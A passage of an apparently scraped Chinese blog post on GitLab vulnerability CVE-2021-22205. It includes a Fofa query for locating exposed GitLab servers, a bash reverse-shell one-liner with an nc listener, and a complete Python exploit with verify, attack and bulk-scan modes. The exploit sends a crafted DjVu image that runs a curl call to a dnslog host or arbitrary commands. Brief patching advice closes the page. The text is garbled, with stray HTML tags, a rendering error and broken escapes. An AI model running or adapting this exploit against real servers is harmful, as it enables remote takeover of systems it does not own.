sudo docker run –detach </span> –hostname gitlab.example.com </span> –publish 443:443 –publish 80:80 </span> –name gitlab </span> –restart always </span> –volume KaTeX parse error: Undefined control sequence: < at position 335: …n punctuation">̲<̲/span> <span …GITLAB_HOME/logs:/var/log/gitlab </span> –volume $GITLAB_HOME/data:/var/opt/gitlab </span> gitlab/gitlab-ce:13.9.1-ce.0
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
Fofa语法
title="GitLab" && country="CN"
1
漏洞利用脚本
https://github.com/Al1ex/CVE-2021-22205
1
反弹Shell
如果目标主机出网的话,可以尝试反弹Shell
使用linux命令反弹shell
bash -i >& /dev/tcp/ip/port 0>&1
1
nc监听10000端口
nc -lvp 10000
1
成功上线
执行命令RCE
Exp
import requests
from bs4 import BeautifulSoup
import base64
import random
import sys
import os
import argparse
requests.packages.urllib3.disable_warnings()
def title(): print(""" / <span class="token punctuation"></span> <span class="token punctuation"></span> / / <span class="token punctuation">|</span> <span class="token punctuation">|</span> <span class="token punctuation"></span> / <span class="token punctuation"></span> <span class="token punctuation"></span>/ <span class="token punctuation">|</span> <span class="token punctuation">|</span> <span class="token punctuation"></span><span class="token punctuation">|</span><span class="token variable"></span> <span class="token punctuation"></span><span class="token punctuation">|</span><span class="token variable"></span> <span class="token punctuation"></span> / <span class="token punctuation"></span><span class="token punctuation">|</span> <span class="token variable"></span><span class="token punctuation">|</span> <span class="token punctuation">|</span> <span class="token punctuation">|</span> <span class="token punctuation"></span> <span class="token punctuation"></span> / /<span class="token punctuation">|</span> <span class="token punctuation">|</span> ) <span class="token punctuation">|</span> <span class="token punctuation">|</span> <span class="token punctuation">|</span> <span class="token punctuation">|</span>) <span class="token punctuation">|</span> <span class="token punctuation">|</span> ) <span class="token punctuation">|</span> ) <span class="token punctuation">|</span> ) <span class="token punctuation">|</span> <span class="token punctuation">|</span> <span class="token punctuation">|</span> <span class="token punctuation">|</span> <span class="token punctuation"></span> <span class="token punctuation">|</span> <span class="token punctuation">|</span> <span class="token punctuation"></span> <span class="token variable">V</span> / <span class="token punctuation">|</span> <span class="token punctuation">|</span><span class="token punctuation">|</span>/ /<span class="token punctuation">|</span> <span class="token punctuation">|</span><span class="token variable">_</span><span class="token punctuation">|</span> / /<span class="token punctuation">|</span> <span class="token punctuation">|</span><span class="token variable"></span>/ / / / / /<span class="token punctuation">|</span> <span class="token punctuation">|</span><span class="token punctuation">|</span> <span class="token punctuation">|</span>) <span class="token punctuation">|</span> <span class="token punctuation"></span> <span class="token punctuation">|</span> <span class="token punctuation"></span>/ <span class="token punctuation">|</span><span class="token variable"></span><span class="token punctuation">|</span> <span class="token punctuation">|</span><span class="token punctuation">|</span><span class="token punctuation"></span>/<span class="token variable"></span><span class="token punctuation">|</span><span class="token variable">_</span><span class="token punctuation">|</span> <span class="token punctuation">|</span><span class="token punctuation">|</span><span class="token variable"></span><span class="token punctuation">|</span><span class="token punctuation">|</span><span class="token punctuation"></span>/<span class="token punctuation">|</span><span class="token variable">_</span>/</span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span></span>
<span class="token variable">Author</span><span class="token punctuation">:</span><span class="token variable">Al1ex</span><span class="token punctuation">@</span><span class="token variable">Heptagram</span>
<span class="token variable">Github</span><span class="token punctuation">:</span><span class="token variable">https</span><span class="token punctuation">:</span><span class="token punctuation">/</span><span class="token punctuation">/</span><span class="token variable">github</span><span class="token punctuation">.</span><span class="token variable">com</span><span class="token punctuation">/</span><span class="token variable">Al1ex</span>
<span class="token string">""</span><span class="token punctuation">"</span><span class="token punctuation">)</span>
<span class="token variable">print</span><span class="token punctuation">(</span><span class="token string">''</span><span class="token punctuation">'</span>
<span class="token variable">验证模式:python</span> <span class="token variable">CVE-</span><span class="token number">2021</span><span class="token variable">-</span><span class="token number">22205.</span><span class="token variable">py</span> <span class="token variable">-v</span> <span class="token boolean">true</span> <span class="token variable">-t</span> <span class="token variable">target_url</span>
<span class="token variable">攻击模式:python</span> <span class="token variable">CVE-</span><span class="token number">2021</span><span class="token variable">-</span><span class="token number">22205.</span><span class="token variable">py</span> <span class="token variable">-a</span> <span class="token boolean">true</span> <span class="token variable">-t</span> <span class="token variable">target_url</span> <span class="token variable">-c</span> <span class="token variable">command</span>
<span class="token variable">批量检测:python</span> <span class="token variable">CVE-</span><span class="token number">2021</span><span class="token variable">-</span><span class="token number">22205.</span><span class="token variable">py</span> <span class="token variable">-s</span> <span class="token boolean">true</span> <span class="token variable">-f</span> <span class="token variable">file</span>
<span class="token string">''</span><span class="token punctuation">'</span><span class="token punctuation">)</span>
def check(target_url): session = requests.Session() try: req1 = session.get(target_url.strip("/") + “/users/sign_in”, verify=False) soup = BeautifulSoup(req1.text, features=“lxml”) token = soup.findAll(‘meta’)[16].get(“content”) data = “rn------WebKitFormBoundaryIMv3mxRg59TkFSX5rnContent-Disposition: form-data; name=“file”; filename=“test.jpg”rnContent-Type: image/jpegrnrnAT&TFORMx00x00x03xafDJVMDIRMx00x00x00.x81x00x02x00x00x00Fx00x00x00xacxffxffxdexbfx99 !xc8x91Nxebx0cx07x1fxd2xdax88xe8kxe6Dx0f,qx02xeeIxd3nx95xbdxa2xc3”?FORMx00x00x00^DJVUINFOx00x00x00nx00x08x00x08x18x00dx00x16x00INCLx00x00x00x0fshared_anno.iffx00BG44x00x00x00x11x00Jx01x02x00x08x00x08x8axe6xe1xb17xd9*x89x00BG44x00x00x00x04x01x0fxf9x9fBG44x00x00x00x02x02nFORMx00x00x03x07DJVIANTax00x00x01P(metadatant(Copyright “\n” . qx{curl whoami.82sm53.dnslog.cn} . \n" b “) ) nrn------WebKitFormBoundaryIMv3mxRg59TkFSX5–rnrn” headers = { “User-Agent”: “Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36”, “Connection”: “close”, “Content-Type”: “multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5”, “X-CSRF-Token”: f"{token}", “Accept-Encoding”: “gzip, deflate”} flag = ‘Failed to process image’ req2 = session.post(target_url.strip("/") + “/uploads/user”, data=data, headers=headers, verify=False) if flag in req2.text: print("[+] 目标 {} 存在漏洞".format(target_url)) else: print("[-] 目标 {} 不存在漏洞".format(target_url)) except Exception as e: print(e)
def attack(target_url,command): session = requests.Session() try: req1 = session.get(target_url.strip("/") + “/users/sign_in”, verify=False) soup = BeautifulSoup(req1.text, features=“lxml”) token = soup.findAll(‘meta’)[16].get(“content”) data = “rn------WebKitFormBoundaryIMv3mxRg59TkFSX5rnContent-Disposition: form-data; name=“file”; filename=“test.jpg”rnContent-Type: image/jpegrnrnAT&TFORMx00x00x03xafDJVMDIRMx00x00x00.x81x00x02x00x00x00Fx00x00x00xacxffxffxdexbfx99 !xc8x91Nxebx0cx07x1fxd2xdax88xe8kxe6Dx0f,qx02xeeIxd3nx95xbdxa2xc3”?FORMx00x00x00^DJVUINFOx00x00x00nx00x08x00x08x18x00dx00x16x00INCLx00x00x00x0fshared_anno.iffx00BG44x00x00x00x11x00Jx01x02x00x08x00x08x8axe6xe1xb17xd9*x89x00BG44x00x00x00x04x01x0fxf9x9fBG44x00x00x00x02x02nFORMx00x00x03x07DJVIANTax00x00x01P(metadatant(Copyright “\n” . qx{"+ command +"} . \n" b “) ) nrn------WebKitFormBoundaryIMv3mxRg59TkFSX5–rnrn” headers = { “User-Agent”: “Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36”, “Connection”: “close”, “Content-Type”: “multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5”, “X-CSRF-Token”: f"{token}", “Accept-Encoding”: “gzip, deflate”} flag = ‘Failed to process image’ req2 = session.post(target_url.strip("/") + “/uploads/user”, data=data, headers=headers, verify=False) if flag in req2.text: print("[+] 目标 {} 存在漏洞".format(target_url)) print("[+] 请到dnslog或主机检查执行结果") else: print("[-] 目标 {} 不存在漏洞".format(target_url)) except Exception as e: print(e)
def scan(file): for url_link in open(file, ‘r’, encoding=‘utf-8’): if url_link.strip() != ‘’: url_path = format_url(url_link.strip()) check(url_path)
def format_url(url): try: if url[:4] != “http”: url = “https://” + url url = url.strip() return url except Exception as e: print(‘URL 错误 {0}’.format(url))
def main(): parser = argparse.ArgumentParser(description=‘GitLab < 13.10.3 RCE’) parser.add_argument(’-v’, ‘–verify’, type=bool,help=’ 验证模式 ‘) parser.add_argument(’-t’, ‘–target’, type=str, help=’ 目标URL ')
<span class="token variable">parser</span><span class="token punctuation">.</span><span class="token variable">add_argument</span><span class="token punctuation">(</span><span class="token string">'-a'</span><span class="token punctuation">,</span> <span class="token string">'--attack'</span><span class="token punctuation">,</span> <span class="token variable">type</span><span class="token punctuation">=</span><span class="token variable">bool</span><span class="token punctuation">,</span> <span class="token variable">help</span><span class="token punctuation">=</span><span class="token string">' 攻击模式 '</span><span class="token punctuation">)</span>
<span class="token variable">parser</span><span class="token punctuation">.</span><span class="token variable">add_argument</span><span class="token punctuation">(</span><span class="token string">'-c'</span><span class="token punctuation">,</span> <span class="token string">'--command'</span><span class="token punctuation">,</span> <span class="token variable">type</span><span class="token punctuation">=</span><span class="token variable">str</span><span class="token punctuation">,</span> <span class="token variable">help</span><span class="token punctuation">=</span><span class="token string">' 执行命令 '</span><span class="token punctuation">)</span>
<span class="token variable">parser</span><span class="token punctuation">.</span><span class="token variable">add_argument</span><span class="token punctuation">(</span><span class="token string">'-s'</span><span class="token punctuation">,</span> <span class="token string">'--scan'</span><span class="token punctuation">,</span> <span class="token variable">type</span><span class="token punctuation">=</span><span class="token variable">bool</span><span class="token punctuation">,</span> <span class="token variable">help</span><span class="token punctuation">=</span><span class="token string">' 批量模式 '</span><span class="token punctuation">)</span>
<span class="token variable">parser</span><span class="token punctuation">.</span><span class="token variable">add_argument</span><span class="token punctuation">(</span><span class="token string">'-f'</span><span class="token punctuation">,</span> <span class="token string">'--file'</span><span class="token punctuation">,</span> <span class="token variable">type</span><span class="token punctuation">=</span><span class="token variable">str</span><span class="token punctuation">,</span> <span class="token variable">help</span><span class="token punctuation">=</span><span class="token string">' 文件路径 '</span><span class="token punctuation">)</span>
<span class="token variable">args</span> <span class="token punctuation">=</span> <span class="token variable">parser</span><span class="token punctuation">.</span><span class="token variable">parse_args</span><span class="token punctuation">(</span><span class="token punctuation">)</span>
<span class="token variable">verify_model</span> <span class="token punctuation">=</span> <span class="token variable">args</span><span class="token punctuation">.</span><span class="token variable">verify</span>
<span class="token variable">target_url</span> <span class="token punctuation">=</span> <span class="token variable">args</span><span class="token punctuation">.</span><span class="token variable">target</span>
<span class="token variable">attack_model</span> <span class="token punctuation">=</span> <span class="token variable">args</span><span class="token punctuation">.</span><span class="token variable">attack</span>
<span class="token variable">command</span> <span class="token punctuation">=</span> <span class="token variable">args</span><span class="token punctuation">.</span><span class="token variable">command</span>
<span class="token variable">scan_model</span> <span class="token punctuation">=</span> <span class="token variable">args</span><span class="token punctuation">.</span><span class="token variable">scan</span>
<span class="token variable">file</span> <span class="token punctuation">=</span> <span class="token variable">args</span><span class="token punctuation">.</span><span class="token variable">file</span>
<span class="token variable">if</span> <span class="token variable">verify_model</span> <span class="token variable">is</span> <span class="token variable">True</span> <span class="token variable">and</span> <span class="token variable">target_url</span> <span class="token punctuation">!</span><span class="token punctuation">=</span><span class="token variable">None</span><span class="token punctuation">:</span>
<span class="token variable">check</span><span class="token punctuation">(</span><span class="token variable">target_url</span><span class="token punctuation">)</span>
<span class="token variable">elif</span> <span class="token variable">attack_model</span> <span class="token variable">is</span> <span class="token variable">True</span> <span class="token variable">and</span> <span class="token variable">target_url</span> <span class="token punctuation">!</span><span class="token punctuation">=</span> <span class="token variable">None</span> <span class="token variable">and</span> <span class="token variable">command</span> <span class="token punctuation">!</span><span class="token punctuation">=</span> <span class="token variable">None</span><span class="token punctuation">:</span>
<span class="token variable">attack</span><span class="token punctuation">(</span><span class="token variable">target_url</span><span class="token punctuation">,</span><span class="token variable">command</span><span class="token punctuation">)</span>
<span class="token variable">elif</span> <span class="token variable">scan_model</span> <span class="token variable">is</span> <span class="token variable">True</span> <span class="token variable">and</span> <span class="token variable">file</span> <span class="token punctuation">!</span><span class="token punctuation">=</span> <span class="token variable">None</span><span class="token punctuation">:</span>
<span class="token variable">scan</span><span class="token punctuation">(</span><span class="token variable">file</span><span class="token punctuation">)</span>
<span class="token variable">else</span><span class="token punctuation">:</span>
<span class="token variable">sys</span><span class="token punctuation">.</span><span class="token variable">exit</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">)</span>
if name == ‘main’: title() main()
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
- 25
- 26
- 27
- 28
- 29
- 30
- 31
- 32
- 33
- 34
- 35
- 36
- 37
- 38
- 39
- 40
- 41
- 42
- 43
- 44
- 45
- 46
- 47
- 48
- 49
- 50
- 51
- 52
- 53
- 54
- 55
- 56
- 57
- 58
- 59
- 60
- 61
- 62
- 63
- 64
- 65
- 66
- 67
- 68
- 69
- 70
- 71
- 72
- 73
- 74
- 75
- 76
- 77
- 78
- 79
- 80
- 81
- 82
- 83
- 84
- 85
- 86
- 87
- 88
- 89
- 90
- 91
- 92
- 93
- 94
- 95
- 96
- 97
- 98
- 99
- 100
- 101
- 102
- 103
- 104
- 105
- 106
- 107
- 108
- 109
- 110
- 111
- 112
- 113
- 114
- 115
- 116
- 117
- 118
- 119
- 120
漏洞防范及修复
官方修复 目前官方已发布新版本修复了该漏洞,请受影响的用户尽快升级至最新版本进行防护,官方下载链接:
https://about.gitlab.com/update/
1
临时防护措施
使用白名单限制对Web端口的访问